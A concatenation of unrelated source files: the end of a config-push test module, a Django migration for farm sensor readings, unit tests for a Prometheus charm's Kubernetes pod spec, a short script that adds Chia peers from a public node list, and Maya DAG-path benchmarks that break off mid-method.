        """configpush_test4_policies.json compared against its golden json."""
        self._push_and_compare('configpush_test4_policies.json.gz',
                               'configpush_test4_policies',
                               'configpush_test4_policies_tenant_golden.json.gz')

    def test_configpush_test4_policies_with_useipEpgs(self):
        """configpush_test4_policies.json pushed with useipEpgs, compared against its golden json."""
        self._push_and_compare('configpush_test4_policies.json.gz',
                               'configpush_test4_policies',
                               'configpush_test4_policies_with_useipEpgs_tenant_golden.json.gz',
                               useipEpgs=True)
if __name__ == '__main__':
    # Build an explicit suite of the two config-push test cases.
    configpush = unittest.TestSuite()
    configpush.addTest(unittest.makeSuite(TestConfigpush))
    configpush.addTest(unittest.makeSuite(TestCheckForAllTheJsonConfigs))
    # NOTE(review): unittest.main() performs its own test discovery over this
    # module and ignores the `configpush` suite built above; to run exactly
    # that suite it would have to be passed to a TextTestRunner — confirm
    # which behavior is intended.
    unittest.main()
| 37.744148
| 199
| 0.539599
| 11,663
| 116,101
| 5.171997
| 0.030352
| 0.029675
| 0.025895
| 0.026923
| 0.916563
| 0.906898
| 0.898344
| 0.890983
| 0.886391
| 0.88097
| 0
| 0.052233
| 0.354088
| 116,101
| 3,075
| 200
| 37.756423
| 0.752144
| 0.000319
| 0
| 0.72894
| 0
| 0
| 0.424281
| 0.079096
| 0
| 0
| 0
| 0
| 0.085361
| 0
| null | null | 0.002246
| 0.004493
| null | null | 0.006739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
14afe96992ebf23e6baeb6f0f95d35b2316307c4
| 4,790
|
py
|
Python
|
irrigator_pro/farms/migrations/0007_auto_20150614_1333.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
irrigator_pro/farms/migrations/0007_auto_20150614_1333.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
irrigator_pro/farms/migrations/0007_auto_20150614_1333.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated schema migration for the farms app (2015-06-14).

    Drops ``Probe.field`` and adds comment/ignore/irrigation/temperature
    columns to ``ProbeReading`` and ``WaterHistory``; also alters the
    soil-potential and water columns to nullable/blank decimals.
    NOTE: auto-generated migration — do not hand-edit operations after it
    has been applied anywhere.
    """

    dependencies = [
        ('farms', '0006_auto_20150603_2146'),
    ]

    operations = [
        # Probe no longer references a single field.
        migrations.RemoveField(
            model_name='probe',
            name='field',
        ),
        # New ProbeReading columns.
        migrations.AddField(
            model_name='probereading',
            name='comment',
            field=models.TextField(blank=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='probereading',
            name='ignore',
            field=models.BooleanField(default=False),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='probereading',
            name='irrigation',
            field=models.DecimalField(default=0.0, verbose_name=b'irrigation in inches', max_digits=4, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='probereading',
            name='max_temp_24_hours',
            field=models.DecimalField(null=True, verbose_name=b'Maximum temperature in last 24 hours', max_digits=5, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='probereading',
            name='min_temp_24_hours',
            field=models.DecimalField(null=True, verbose_name=b'Minimum temperature in last 24 hours', max_digits=5, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='probereading',
            name='rain',
            field=models.DecimalField(default=0.0, verbose_name=b'rainfall in inches', max_digits=4, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        # New WaterHistory columns (mirrors the ProbeReading additions).
        migrations.AddField(
            model_name='waterhistory',
            name='ignore',
            field=models.BooleanField(default=False),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='waterhistory',
            name='max_temp_24_hours',
            field=models.DecimalField(null=True, verbose_name=b'Maximum temperature in last 24 hours', max_digits=5, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='waterhistory',
            name='min_temp_24_hours',
            field=models.DecimalField(null=True, verbose_name=b'Minimum temperature in last 24 hours', max_digits=5, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='waterhistory',
            name='soil_potential_16',
            field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='waterhistory',
            name='soil_potential_24',
            field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='waterhistory',
            name='soil_potential_8',
            field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        # Existing columns relaxed to nullable/blank decimals.
        migrations.AlterField(
            model_name='probereading',
            name='soil_potential_16',
            field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='probereading',
            name='soil_potential_24',
            field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='probereading',
            name='soil_potential_8',
            field=models.DecimalField(default=0.0, null=True, max_digits=5, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='waterhistory',
            name='irrigation',
            field=models.DecimalField(default=0.0, verbose_name=b'irrigation in inches', max_digits=4, decimal_places=2, blank=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='waterhistory',
            name='rain',
            field=models.DecimalField(default=0.0, verbose_name=b'rainfall in inches', max_digits=4, decimal_places=2, blank=True),
            preserve_default=True,
        ),
    ]
| 39.586777
| 147
| 0.60501
| 505
| 4,790
| 5.534653
| 0.132673
| 0.057961
| 0.115564
| 0.166011
| 0.919141
| 0.919141
| 0.903757
| 0.903757
| 0.903757
| 0.89517
| 0
| 0.026632
| 0.286639
| 4,790
| 120
| 148
| 39.916667
| 0.791337
| 0.004384
| 0
| 0.885965
| 0
| 0
| 0.142018
| 0.004825
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.04386
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1adbae64bb2e55f83dfcbef5ca1aac25a3ded370
| 23,583
|
py
|
Python
|
installers/charm/prometheus/tests/test_pod_spec.py
|
ayoubbargueoui1996/osm-devops
|
b5973c2a4477354bb17a56fe39559f277a3a994a
|
[
"Apache-2.0"
] | null | null | null |
installers/charm/prometheus/tests/test_pod_spec.py
|
ayoubbargueoui1996/osm-devops
|
b5973c2a4477354bb17a56fe39559f277a3a994a
|
[
"Apache-2.0"
] | null | null | null |
installers/charm/prometheus/tests/test_pod_spec.py
|
ayoubbargueoui1996/osm-devops
|
b5973c2a4477354bb17a56fe39559f277a3a994a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2020 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# For those usages not covered by the Apache License, Version 2.0 please
# contact: legal@canonical.com
#
# To get in touch with the maintainers, please contact:
# osm-charmers@lists.launchpad.net
##
from typing import NoReturn
import unittest
import pod_spec
class TestPodSpec(unittest.TestCase):
    """Pod spec unit tests.

    Each test builds the expected Juju pod-spec fragment as a literal and
    compares it against the output of the corresponding ``pod_spec`` helper.
    (Annotations changed from ``NoReturn`` to ``None``: these methods return
    normally; ``NoReturn`` is reserved for functions that never return.)
    """

    def test_make_pod_ports(self) -> None:
        """Testing make pod ports."""
        port = 9090
        expected_result = [
            {
                "name": "prometheus",
                "containerPort": port,
                "protocol": "TCP",
            }
        ]
        pod_ports = pod_spec._make_pod_ports(port)
        self.assertListEqual(expected_result, pod_ports)

    def test_make_pod_envconfig(self) -> None:
        """Testing make pod envconfig."""
        config = {}
        relation_state = {}
        expected_result = {}
        pod_envconfig = pod_spec._make_pod_envconfig(config, relation_state)
        self.assertDictEqual(expected_result, pod_envconfig)

    def test_make_pod_ingress_resources_without_site_url(self) -> None:
        """Testing make pod ingress resources without site_url."""
        config = {"site_url": ""}
        app_name = "prometheus"
        port = 9090
        pod_ingress_resources = pod_spec._make_pod_ingress_resources(
            config, app_name, port
        )
        # No site_url configured -> no ingress resources are generated.
        self.assertIsNone(pod_ingress_resources)

    def test_make_pod_ingress_resources(self) -> None:
        """Testing make pod ingress resources."""
        config = {
            "site_url": "http://prometheus",
            "max_file_size": 0,
            "ingress_whitelist_source_range": "",
        }
        app_name = "prometheus"
        port = 9090
        expected_result = [
            {
                "name": f"{app_name}-ingress",
                "annotations": {
                    "nginx.ingress.kubernetes.io/proxy-body-size": f"{config['max_file_size']}",
                    "nginx.ingress.kubernetes.io/ssl-redirect": "false",
                },
                "spec": {
                    "rules": [
                        {
                            "host": app_name,
                            "http": {
                                "paths": [
                                    {
                                        "path": "/",
                                        "backend": {
                                            "serviceName": app_name,
                                            "servicePort": port,
                                        },
                                    }
                                ]
                            },
                        }
                    ]
                },
            }
        ]
        pod_ingress_resources = pod_spec._make_pod_ingress_resources(
            config, app_name, port
        )
        self.assertListEqual(expected_result, pod_ingress_resources)

    def test_make_pod_ingress_resources_with_whitelist_source_range(self) -> None:
        """Testing make pod ingress resources with whitelist_source_range."""
        config = {
            "site_url": "http://prometheus",
            "max_file_size": 0,
            "ingress_whitelist_source_range": "0.0.0.0/0",
        }
        app_name = "prometheus"
        port = 9090
        expected_result = [
            {
                "name": f"{app_name}-ingress",
                "annotations": {
                    "nginx.ingress.kubernetes.io/proxy-body-size": f"{config['max_file_size']}",
                    "nginx.ingress.kubernetes.io/ssl-redirect": "false",
                    # Whitelist annotation appears only when the range is set.
                    "nginx.ingress.kubernetes.io/whitelist-source-range": config[
                        "ingress_whitelist_source_range"
                    ],
                },
                "spec": {
                    "rules": [
                        {
                            "host": app_name,
                            "http": {
                                "paths": [
                                    {
                                        "path": "/",
                                        "backend": {
                                            "serviceName": app_name,
                                            "servicePort": port,
                                        },
                                    }
                                ]
                            },
                        }
                    ]
                },
            }
        ]
        pod_ingress_resources = pod_spec._make_pod_ingress_resources(
            config, app_name, port
        )
        self.assertListEqual(expected_result, pod_ingress_resources)

    def test_make_pod_ingress_resources_with_https(self) -> None:
        """Testing make pod ingress resources with HTTPs."""
        config = {
            "site_url": "https://prometheus",
            "max_file_size": 0,
            "ingress_whitelist_source_range": "",
            "tls_secret_name": "",
        }
        app_name = "prometheus"
        port = 9090
        expected_result = [
            {
                "name": f"{app_name}-ingress",
                # With an https site_url the ssl-redirect annotation is omitted.
                "annotations": {
                    "nginx.ingress.kubernetes.io/proxy-body-size": f"{config['max_file_size']}",
                },
                "spec": {
                    "rules": [
                        {
                            "host": app_name,
                            "http": {
                                "paths": [
                                    {
                                        "path": "/",
                                        "backend": {
                                            "serviceName": app_name,
                                            "servicePort": port,
                                        },
                                    }
                                ]
                            },
                        }
                    ],
                    # No tls_secret_name -> tls entry lists only the host.
                    "tls": [{"hosts": [app_name]}],
                },
            }
        ]
        pod_ingress_resources = pod_spec._make_pod_ingress_resources(
            config, app_name, port
        )
        self.assertListEqual(expected_result, pod_ingress_resources)

    def test_make_pod_ingress_resources_with_https_tls_secret_name(self) -> None:
        """Testing make pod ingress resources with HTTPs and TLS secret name."""
        config = {
            "site_url": "https://prometheus",
            "max_file_size": 0,
            "ingress_whitelist_source_range": "",
            "tls_secret_name": "secret_name",
        }
        app_name = "prometheus"
        port = 9090
        expected_result = [
            {
                "name": f"{app_name}-ingress",
                "annotations": {
                    "nginx.ingress.kubernetes.io/proxy-body-size": f"{config['max_file_size']}",
                },
                "spec": {
                    "rules": [
                        {
                            "host": app_name,
                            "http": {
                                "paths": [
                                    {
                                        "path": "/",
                                        "backend": {
                                            "serviceName": app_name,
                                            "servicePort": port,
                                        },
                                    }
                                ]
                            },
                        }
                    ],
                    "tls": [
                        {"hosts": [app_name], "secretName": config["tls_secret_name"]}
                    ],
                },
            }
        ]
        pod_ingress_resources = pod_spec._make_pod_ingress_resources(
            config, app_name, port
        )
        self.assertListEqual(expected_result, pod_ingress_resources)

    def test_make_pod_files(self) -> None:
        """Testing make pod files."""
        config = {
            "web_subpath": "/",
            "default_target": "",
            "site_url": "",
        }
        # Expected prometheus.yml rendered into the config volume.
        expected_result = [
            {
                "name": "config",
                "mountPath": "/etc/prometheus",
                "files": [
                    {
                        "path": "prometheus.yml",
                        "content": (
                            "global:\n"
                            "  scrape_interval: 15s\n"
                            "  evaluation_interval: 15s\n"
                            "alerting:\n"
                            "  alertmanagers:\n"
                            "  - static_configs:\n"
                            "    - targets:\n"
                            "rule_files:\n"
                            "scrape_configs:\n"
                            "  - job_name: 'prometheus'\n"
                            "    static_configs:\n"
                            "    - targets: [{}]\n".format(config["default_target"])
                        ),
                    }
                ],
            }
        ]
        pod_envconfig = pod_spec._make_pod_files(config)
        self.assertListEqual(expected_result, pod_envconfig)

    def test_make_readiness_probe(self) -> None:
        """Testing make readiness probe."""
        port = 9090
        expected_result = {
            "httpGet": {
                "path": "/-/ready",
                "port": port,
            },
            "initialDelaySeconds": 10,
            "timeoutSeconds": 30,
        }
        readiness_probe = pod_spec._make_readiness_probe(port)
        self.assertDictEqual(expected_result, readiness_probe)

    def test_make_liveness_probe(self) -> None:
        """Testing make liveness probe."""
        port = 9090
        expected_result = {
            "httpGet": {
                "path": "/-/healthy",
                "port": port,
            },
            "initialDelaySeconds": 30,
            "periodSeconds": 30,
        }
        liveness_probe = pod_spec._make_liveness_probe(port)
        self.assertDictEqual(expected_result, liveness_probe)

    def test_make_pod_command(self) -> None:
        """Testing make pod command."""
        port = 9090
        config = {
            "web_subpath": "/",
            "default_target": "",
            "site_url": "",
        }
        expected_result = [
            "/bin/prometheus",
            "--config.file=/etc/prometheus/prometheus.yml",
            "--storage.tsdb.path=/prometheus",
            "--web.console.libraries=/usr/share/prometheus/console_libraries",
            "--web.console.templates=/usr/share/prometheus/consoles",
            "--web.route-prefix={}".format(config.get("web_subpath")),
            "--web.external-url=http://localhost:{}{}".format(
                port, config.get("web_subpath")
            ),
        ]
        pod_envconfig = pod_spec._make_pod_command(config, port)
        self.assertListEqual(expected_result, pod_envconfig)

    def test_make_pod_command_with_web_admin_api_enabled(self) -> None:
        """Testing make pod command with the web admin API flag enabled."""
        port = 9090
        config = {
            "web_subpath": "/",
            "default_target": "",
            "site_url": "",
            "enable_web_admin_api": True,
        }
        expected_result = [
            "/bin/prometheus",
            "--config.file=/etc/prometheus/prometheus.yml",
            "--storage.tsdb.path=/prometheus",
            "--web.console.libraries=/usr/share/prometheus/console_libraries",
            "--web.console.templates=/usr/share/prometheus/consoles",
            "--web.route-prefix={}".format(config.get("web_subpath")),
            "--web.external-url=http://localhost:{}{}".format(
                port, config.get("web_subpath")
            ),
            # Extra flag appended when enable_web_admin_api is true.
            "--web.enable-admin-api",
        ]
        pod_envconfig = pod_spec._make_pod_command(config, port)
        self.assertListEqual(expected_result, pod_envconfig)

    def test_make_pod_spec(self) -> None:
        """Testing make pod spec."""
        image_info = {"upstream-source": "ubuntu/prometheus:latest"}
        config = {
            "web_subpath": "/",
            "default_target": "",
            "site_url": "",
            "enable_web_admin_api": False,
        }
        relation_state = {}
        app_name = "prometheus"
        port = 9090
        expected_result = {
            "version": 3,
            "containers": [
                {
                    "name": app_name,
                    "imageDetails": image_info,
                    "imagePullPolicy": "Always",
                    "ports": [
                        {
                            "name": app_name,
                            "containerPort": port,
                            "protocol": "TCP",
                        }
                    ],
                    "envConfig": {},
                    "volumeConfig": [
                        {
                            "name": "config",
                            "mountPath": "/etc/prometheus",
                            "files": [
                                {
                                    "path": "prometheus.yml",
                                    "content": (
                                        "global:\n"
                                        "  scrape_interval: 15s\n"
                                        "  evaluation_interval: 15s\n"
                                        "alerting:\n"
                                        "  alertmanagers:\n"
                                        "  - static_configs:\n"
                                        "    - targets:\n"
                                        "rule_files:\n"
                                        "scrape_configs:\n"
                                        "  - job_name: 'prometheus'\n"
                                        "    static_configs:\n"
                                        "    - targets: [{}]\n".format(
                                            config.get("default_target")
                                        )
                                    ),
                                }
                            ],
                        }
                    ],
                    "command": [
                        "/bin/prometheus",
                        "--config.file=/etc/prometheus/prometheus.yml",
                        "--storage.tsdb.path=/prometheus",
                        "--web.console.libraries=/usr/share/prometheus/console_libraries",
                        "--web.console.templates=/usr/share/prometheus/consoles",
                        "--web.route-prefix={}".format(config.get("web_subpath")),
                        "--web.external-url=http://localhost:{}{}".format(
                            port, config.get("web_subpath")
                        ),
                    ],
                    "kubernetes": {
                        "readinessProbe": {
                            "httpGet": {
                                "path": "/-/ready",
                                "port": port,
                            },
                            "initialDelaySeconds": 10,
                            "timeoutSeconds": 30,
                        },
                        "livenessProbe": {
                            "httpGet": {
                                "path": "/-/healthy",
                                "port": port,
                            },
                            "initialDelaySeconds": 30,
                            "periodSeconds": 30,
                        },
                    },
                }
            ],
            # No site_url -> no ingress resources in the spec.
            "kubernetesResources": {"ingressResources": []},
        }
        spec = pod_spec.make_pod_spec(
            image_info, config, relation_state, app_name, port
        )
        self.assertDictEqual(expected_result, spec)

    def test_make_pod_spec_with_ingress(self) -> None:
        """Testing make pod spec with ingress resources included."""
        image_info = {"upstream-source": "ubuntu/prometheus:latest"}
        config = {
            "web_subpath": "/",
            "default_target": "",
            "site_url": "https://prometheus",
            "tls_secret_name": "prometheus",
            "max_file_size": 0,
            "ingress_whitelist_source_range": "0.0.0.0/0",
            "enable_web_admin_api": False,
        }
        relation_state = {}
        app_name = "prometheus"
        port = 9090
        expected_result = {
            "version": 3,
            "containers": [
                {
                    "name": app_name,
                    "imageDetails": image_info,
                    "imagePullPolicy": "Always",
                    "ports": [
                        {
                            "name": app_name,
                            "containerPort": port,
                            "protocol": "TCP",
                        }
                    ],
                    "envConfig": {},
                    "volumeConfig": [
                        {
                            "name": "config",
                            "mountPath": "/etc/prometheus",
                            "files": [
                                {
                                    "path": "prometheus.yml",
                                    "content": (
                                        "global:\n"
                                        "  scrape_interval: 15s\n"
                                        "  evaluation_interval: 15s\n"
                                        "alerting:\n"
                                        "  alertmanagers:\n"
                                        "  - static_configs:\n"
                                        "    - targets:\n"
                                        "rule_files:\n"
                                        "scrape_configs:\n"
                                        "  - job_name: 'prometheus'\n"
                                        "    static_configs:\n"
                                        "    - targets: [{}]\n".format(
                                            config.get("default_target")
                                        )
                                    ),
                                }
                            ],
                        }
                    ],
                    "command": [
                        "/bin/prometheus",
                        "--config.file=/etc/prometheus/prometheus.yml",
                        "--storage.tsdb.path=/prometheus",
                        "--web.console.libraries=/usr/share/prometheus/console_libraries",
                        "--web.console.templates=/usr/share/prometheus/consoles",
                        "--web.route-prefix={}".format(config.get("web_subpath")),
                        "--web.external-url=http://localhost:{}{}".format(
                            port, config.get("web_subpath")
                        ),
                    ],
                    "kubernetes": {
                        "readinessProbe": {
                            "httpGet": {
                                "path": "/-/ready",
                                "port": port,
                            },
                            "initialDelaySeconds": 10,
                            "timeoutSeconds": 30,
                        },
                        "livenessProbe": {
                            "httpGet": {
                                "path": "/-/healthy",
                                "port": port,
                            },
                            "initialDelaySeconds": 30,
                            "periodSeconds": 30,
                        },
                    },
                }
            ],
            "kubernetesResources": {
                "ingressResources": [
                    {
                        "name": "{}-ingress".format(app_name),
                        "annotations": {
                            "nginx.ingress.kubernetes.io/proxy-body-size": str(
                                config.get("max_file_size")
                            ),
                            "nginx.ingress.kubernetes.io/whitelist-source-range": config.get(
                                "ingress_whitelist_source_range"
                            ),
                        },
                        "spec": {
                            "rules": [
                                {
                                    "host": app_name,
                                    "http": {
                                        "paths": [
                                            {
                                                "path": "/",
                                                "backend": {
                                                    "serviceName": app_name,
                                                    "servicePort": port,
                                                },
                                            }
                                        ]
                                    },
                                }
                            ],
                            "tls": [
                                {
                                    "hosts": [app_name],
                                    "secretName": config.get("tls_secret_name"),
                                }
                            ],
                        },
                    }
                ],
            },
        }
        spec = pod_spec.make_pod_spec(
            image_info, config, relation_state, app_name, port
        )
        self.assertDictEqual(expected_result, spec)

    def test_make_pod_spec_without_image_info(self) -> None:
        """Testing make pod spec without image_info."""
        image_info = None
        config = {
            "web_subpath": "/",
            "default_target": "",
            "site_url": "",
            "enable_web_admin_api": False,
        }
        relation_state = {}
        app_name = "prometheus"
        port = 9090
        spec = pod_spec.make_pod_spec(
            image_info, config, relation_state, app_name, port
        )
        # Missing image information -> no spec at all.
        self.assertIsNone(spec)

    def test_make_pod_spec_without_config(self) -> None:
        """Testing make pod spec without config."""
        image_info = {"upstream-source": "ubuntu/prometheus:latest"}
        config = {}
        relation_state = {}
        app_name = "prometheus"
        port = 9090
        # An empty config is invalid and must raise.
        with self.assertRaises(ValueError):
            pod_spec.make_pod_spec(image_info, config, relation_state, app_name, port)
if __name__ == "__main__":
    # Run the full TestPodSpec suite when this module is executed directly.
    unittest.main()
| 36.790952
| 96
| 0.382606
| 1,588
| 23,583
| 5.430101
| 0.138539
| 0.034095
| 0.055085
| 0.042677
| 0.857358
| 0.828482
| 0.79288
| 0.753334
| 0.715644
| 0.671576
| 0
| 0.010466
| 0.513802
| 23,583
| 640
| 97
| 36.848438
| 0.741584
| 0.057881
| 0
| 0.659218
| 0
| 0
| 0.221021
| 0.074669
| 0
| 0
| 0
| 0
| 0.029795
| 1
| 0.029795
| false
| 0
| 0.005587
| 0
| 0.037244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ae4a0e6b39bb467bae8f236057e5c41611c02df
| 526
|
py
|
Python
|
add.py
|
mockupcode/chia-add-node
|
00ebc72f09f65a456c0a3a660dd0b75cd3aafb51
|
[
"Unlicense"
] | null | null | null |
add.py
|
mockupcode/chia-add-node
|
00ebc72f09f65a456c0a3a660dd0b75cd3aafb51
|
[
"Unlicense"
] | null | null | null |
add.py
|
mockupcode/chia-add-node
|
00ebc72f09f65a456c0a3a660dd0b75cd3aafb51
|
[
"Unlicense"
] | null | null | null |
import json
import os

# Public endpoint serving a JSON document listing known chia full nodes.
NODES_URL = "https://chia.powerlayout.com/nodes?block_height=true&geoip=true"


def format_node(node):
    """Return the ``ip:port`` connection string for one node record.

    ``node`` is a mapping with string values under the keys ``'ip'`` and
    ``'port'`` (as served by the nodes endpoint).
    """
    return node['ip'] + ":" + node['port']


def main():
    """Fetch the public node list and add each node as a chia peer.

    Bug fix: the original script contained the whole fetch-and-add loop
    twice verbatim, so every peer was fetched and added twice; the
    duplicate pass has been removed.
    """
    # Imported lazily: requests is a third-party dependency only needed
    # when the script actually runs (keeps module import dependency-free).
    import requests
    response = json.loads(requests.get(NODES_URL).text)
    for node in response['nodes']:
        # NOTE(review): node-supplied values are interpolated into a shell
        # command; the upstream list is assumed trusted — consider
        # subprocess.run([...], shell=False) to avoid shell injection.
        os.system("chia show -a " + format_node(node))


if __name__ == "__main__":
    main()
| 30.941176
| 107
| 0.714829
| 80
| 526
| 4.625
| 0.3125
| 0.086486
| 0.108108
| 0.12973
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.110266
| 526
| 16
| 108
| 32.875
| 0.790598
| 0
| 0
| 1
| 0
| 0
| 0.334601
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.428571
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
0d2a774ade57f07a82646032d0c0ce0d096f4bca
| 3,970
|
py
|
Python
|
benchmarks/OpenMaya/bench_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | 24
|
2017-01-11T15:57:46.000Z
|
2020-09-23T06:18:30.000Z
|
benchmarks/OpenMaya/bench_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | null | null | null |
benchmarks/OpenMaya/bench_MDagPath.py
|
christophercrouzet/bana
|
8087df05ba9844b4d78d3c4699948ca61cf7621d
|
[
"MIT"
] | 2
|
2017-03-06T23:52:08.000Z
|
2020-09-23T06:19:03.000Z
|
#!/usr/bin/env mayapy
import os
import sys
import unittest
import maya.standalone
import revl
from maya import OpenMaya
_HERE = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, os.path.abspath(os.path.join(_HERE, *((os.pardir,) * 2))))
import bana
import benchmarks._preset
# Module-import side effects: register the bana extensions (e.g. the bnFind
# methods used below) and boot a headless Maya session before any benchmark
# class is instantiated.
bana.initialize()
maya.standalone.initialize()
def _retrieveDeepestDagPath():
    """Return an ``MDagPath`` to the deepest node found in the scene DAG.

    Iterates the whole DAG (including underworld paths) and keeps the
    path whose iterator depth exceeds the best path count seen so far.
    """
    deepest = OpenMaya.MDagPath()
    walker = OpenMaya.MItDag()
    walker.traverseUnderWorld(True)
    while not walker.isDone():
        if walker.depth() > deepest.pathCount():
            walker.getPath(deepest)
        walker.next()
    return deepest
class MDagPathDeepSceneBench(unittest.TestCase):
    """Benchmarks for ``MDagPath.bnFind`` variants on a deep scene graph."""

    @classmethod
    def setUpClass(cls):
        # Start from a fresh scene, then generate 10k nodes with the DEEP
        # preset; the fixed seed keeps the scene identical across runs so
        # timings are comparable.
        OpenMaya.MFileIO.newFile(True)
        revl.run(benchmarks._preset.DEEP, 10000, seed=1.23)

    # Each bench method exhausts the bnFind iterator with a no-op loop so
    # only the traversal cost is measured, across the copy/recursive/pattern
    # argument combinations.

    def benchBnFind1(self):
        for _ in OpenMaya.MDagPath.bnFind():
            pass

    def benchBnFind2(self):
        for _ in OpenMaya.MDagPath.bnFind(copy=False):
            pass

    def benchBnFind3(self):
        for _ in OpenMaya.MDagPath.bnFind(recursive=False):
            pass

    def benchBnFind4(self):
        for _ in OpenMaya.MDagPath.bnFind(recursive=False, copy=False):
            pass

    def benchBnFind5(self):
        for _ in OpenMaya.MDagPath.bnFind(pattern='*'):
            pass

    def benchBnFind6(self):
        for _ in OpenMaya.MDagPath.bnFind(pattern='*', copy=False):
            pass

    def benchBnFind7(self):
        for _ in OpenMaya.MDagPath.bnFind(pattern='*', recursive=False):
            pass

    def benchBnFind8(self):
        for _ in OpenMaya.MDagPath.bnFind(pattern='*', recursive=False,
                                          copy=False):
            pass

    # Variants 9-12 search only under the parent of the deepest node,
    # exercising pattern matching against a long absolute path.

    def benchBnFind9(self):
        dagPath = _retrieveDeepestDagPath()
        dagPath.pop(1)
        pattern = '%s|*' % (dagPath.fullPathName(),)
        for _ in OpenMaya.MDagPath.bnFind(pattern=pattern):
            pass

    def benchBnFind10(self):
        dagPath = _retrieveDeepestDagPath()
        dagPath.pop(1)
        pattern = '%s|*' % (dagPath.fullPathName(),)
        for _ in OpenMaya.MDagPath.bnFind(pattern=pattern, copy=False):
            pass

    def benchBnFind11(self):
        dagPath = _retrieveDeepestDagPath()
        dagPath.pop(1)
        pattern = '%s|*' % (dagPath.fullPathName(),)
        for _ in OpenMaya.MDagPath.bnFind(pattern=pattern, recursive=False):
            pass

    def benchBnFind12(self):
        dagPath = _retrieveDeepestDagPath()
        dagPath.pop(1)
        pattern = '%s|*' % (dagPath.fullPathName(),)
        for _ in OpenMaya.MDagPath.bnFind(pattern=pattern, recursive=False,
                                          copy=False):
            pass
class MDagPathFlatSceneBench(unittest.TestCase):
    """Benchmarks for ``MDagPath.bnFind`` variants on a flat scene graph.

    Mirrors benchBnFind1-8 of the deep-scene suite, but against the FLAT
    preset, to compare traversal cost across scene topologies.
    """

    @classmethod
    def setUpClass(cls):
        # Fresh scene + 10k nodes from the FLAT preset, fixed seed for
        # reproducible timings.
        OpenMaya.MFileIO.newFile(True)
        revl.run(benchmarks._preset.FLAT, 10000, seed=1.23)

    def benchBnFind1(self):
        for _ in OpenMaya.MDagPath.bnFind():
            pass

    def benchBnFind2(self):
        for _ in OpenMaya.MDagPath.bnFind(copy=False):
            pass

    def benchBnFind3(self):
        for _ in OpenMaya.MDagPath.bnFind(recursive=False):
            pass

    def benchBnFind4(self):
        for _ in OpenMaya.MDagPath.bnFind(recursive=False, copy=False):
            pass

    def benchBnFind5(self):
        for _ in OpenMaya.MDagPath.bnFind(pattern='*'):
            pass

    def benchBnFind6(self):
